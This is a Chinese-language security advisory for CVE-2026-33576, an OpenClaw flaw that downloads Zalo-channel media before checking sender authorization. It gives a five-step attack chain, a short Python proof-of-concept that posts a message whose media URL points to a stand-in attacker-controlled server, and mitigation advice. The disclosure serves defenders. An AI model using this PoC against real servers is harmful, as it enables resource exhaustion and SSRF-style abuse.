CVE-2026-33576 CVSS 6.5 中危

CVE-2026-33576 OpenClaw授权绕过漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33576

漏洞类型

授权绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.28 之前的版本存在安全漏洞，其在验证 Zalo 通道发送者授权前即下载并存储入站媒体。未经授权的攻击者可利用此缺陷，发送随后被拒绝的消息强制服务器执行网络获取和磁盘写入，可能导致资源耗尽或存储空间被恶意占用。

技术细节

该漏洞源于 OpenClaw 处理 Zalo 通道消息时的逻辑顺序错误。应用程序在接收到入站消息时，未先验证发送者身份，而是直接处理消息中附带的媒体资源，触发向外部网络的请求并将数据写入本地磁盘存储。只有在资源消耗完成后，系统才校验发送者权限并拒绝该消息。攻击者无需任何认证即可利用此漏洞，通过构造包含特定媒体链接的恶意消息，诱导服务器连续发起网络请求（类似SSRF）并占用磁盘空间。这种攻击不仅消耗带宽和存储资源，还可能利用服务器作为代理发起网络扫描，影响系统可用性和数据完整性。

攻击链分析

STEP 1

侦察

攻击者识别运行 OpenClaw 且开启 Zalo 通道的目标服务器。

STEP 2

武器化

攻击者构造包含恶意或大体积媒体资源 URL 的消息数据包。

STEP 3

传递

攻击者向目标服务器的 Zalo 通道接口发送未经授权的消息。

STEP 4

利用

OpenClaw 在验证发送者权限之前，自动下载并存储指定的媒体文件。

STEP 5

影响

服务器磁盘空间被占用或带宽耗尽，可能导致拒绝服务或完整性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Conceptual PoC for CVE-2026-33576
# This script simulates sending a malicious message to an OpenClaw instance
# to trigger unauthorized media download before authorization checks.

target_url = "http://target-openclaw-instance/api/zalo/receive"
malicious_media_url = "http://attacker-controlled-server/large_file.bin"

payload = {
    "sender_id": "unauthorized_user",
    "message": "test payload",
    "media_url": malicious_media_url
}

try:
    # Send the message to the vulnerable endpoint
    response = requests.post(target_url, json=payload)
    if response.status_code == 200:
        print("[+] Message sent. Server likely downloaded the media before rejecting the message.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

OpenClaw < 2026.3.28

防御指南

临时缓解措施

建议在无法立即升级的情况下，限制 OpenClaw 服务器对非必要外部网络的访问权限，或临时禁用 Zalo 通道功能以阻断攻击向量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表